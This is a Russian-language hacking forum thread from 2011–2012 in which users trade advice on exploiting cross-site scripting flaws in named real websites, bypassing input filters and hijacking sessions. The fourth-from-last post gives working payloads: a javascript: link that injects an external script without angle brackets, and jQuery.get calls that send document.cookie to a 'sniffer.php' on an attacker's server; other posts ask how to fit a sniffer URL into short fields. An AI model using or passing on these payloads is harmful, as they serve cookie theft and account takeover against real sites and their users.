HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.12.2011, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

это POST XSS, для того чтобы заюзать нужно сделать страницу с автосабмитом формы, или поискать уязвимость в гет переменных!
например здесь = http://2sell.com.ua/view.php?id=229&...76&subsubcat=0
 
Ответить с цитированием

  #2  
Старый 16.12.2011, 01:00
cacucko
Новичок
Регистрация: 14.12.2011
Сообщений: 2
С нами: 7585526

Репутация: 0
По умолчанию

Всем привет, вот есть активная xss: http://kib-net.ru/personal/index.php(там при регистрации в имя\фамилию вводим алерт), вопрос, как заюзать эту уязвимость, ведь там вроде никто к тебе в профиль зайти не может, как тогда?
 
Ответить с цитированием

  #3  
Старый 17.12.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

cacucko, никак не заюзаешь. Страница с xss недоступна авторизованным пользователям, следовательно сессию увести не получится.
 
Ответить с цитированием

  #4  
Старый 17.01.2012, 01:00
Lonsdalesar
Познающий
Регистрация: 26.02.2010
Сообщений: 92
С нами: 8530166

Репутация: 7
По умолчанию

Товарищи
На одном сайте решил проверить есть ли уязвимость xss.
Ввел в php запрос alert('xss')
оказалось стоит фильтр и запрос изменил мою строчку и вывел %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

скажите возможно ли обойти этот фильтр?
 
Ответить с цитированием

  #5  
Старый 18.01.2012, 01:00
narviss
Новичок
Регистрация: 01.08.2010
Сообщений: 8
С нами: 8305526

Репутация: 0
По умолчанию

Цитата:

Сообщение от Lonsdalesar

Товарищи
На одном сайте решил проверить есть ли уязвимость xss.
Ввел в php запрос alert('xss')
оказалось стоит фильтр и запрос изменил мою строчку и вывел %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

скажите возможно ли обойти этот фильтр?

Если это в адрессной строке,то это нефильтр)Это одно и тожэ что и alert('xss'), только url-code, так сказать, нечем неотличаются, нечего страшного) А если, товарищ это в самом коде...то фильтр скорей всего)
 
Ответить с цитированием

  #6  
Старый 19.01.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию

что это http://apps.facebook.com/mobipride/ внизу страницы ?
 
Ответить с цитированием

  #7  
Старый 19.01.2012, 01:00
Dinga
Постоянный
Регистрация: 17.02.2011
Сообщений: 495
С нами: 8017526

Репутация: 18
По умолчанию

Цитата:

Сообщение от tickhack

что это http://apps.facebook.com/mobipride/ внизу страницы ?

это просто криво настроенный конфиг...
 
Ответить с цитированием

  #8  
Старый 06.02.2012, 01:00
Sork
Познающий
Регистрация: 03.12.2010
Сообщений: 87
С нами: 8126966

Репутация: 8
По умолчанию

В чем проблема нашел Активную Xss - Это не новость но дело не в этом.

Xss находиться в поле ввода - но дело в том что стоит ограничение по символам - т.е полность скрипт не удается записать.

Это была первая проблема.

Вторая Xss находится на форме тут я решил применить Xss без Xss.

Уязвимость в бб тегах а именно в
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

. Втавляешь все нормально - но после вставки кода -

Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Наблюдаем следущию картину -

Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.


Буду рад помощи.
 
Ответить с цитированием

  #9  
Старый 06.02.2012, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию

Тут угловые скобки заменяются html сущностями. Видать прогнали через функцию htmlspecialchars(). И тут судя по всему скрипт срабатывает по нажатию по ссылки. Нередкий тип уязвимости. Так как тэг скрипта фильтруется, то закачать сам скрипт извне не получится. Но можно попробовать динамически создать скрипт и присвоить ему урл скрипта, лежащего на нашем сервере. Что-то типа

code:

javascript:x=document.createElement('script');x=x.setAttribu te('src','тут урл скрипта');document.getElementsByTagName('he ad').appendChild(x);

Таким образом мы не используя угловые скобки создаем динамический скрипт и подключаем к нему ресурс. Также, если на странице используется jQuery, можно просто поспользоваться этим, прописав

code:

javascript:jQuery.get('http://yoursite.com/sniffer.php?'+document.cookie);
или
javascript:$.get('http://yoursite.com/sniffer.php?'+document.cookie);

При клике данный метод позволяет отправлять get запросы на любой домен в сети. Недавно именно данный метод использовал в xss на одном из известных сайтов. И даже видео снимал. https://hpc.name/showthread.php?t=32341. Посмотри, там именно такого же рода уязвимость, что и у тебя.
 
Ответить с цитированием

  #10  
Старый 06.02.2012, 01:00
hrafa
Познающий
Регистрация: 15.11.2011
Сообщений: 81
С нами: 7627286

Репутация: -3
По умолчанию

Нашел xss в объявлениях. Когда в заголовке пишу скрипт проверки alert("xss") , сообщение видно. А вот когда пишу адрес к снифферу пишет СЛИШКОМ ДЛИННЫЙ ЗАГОЛОВОК. Можно до 25символов добавить в заголовок, что делать? Еще слышал про слепые XSS может кто-нибудь даст ссылку на статью?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.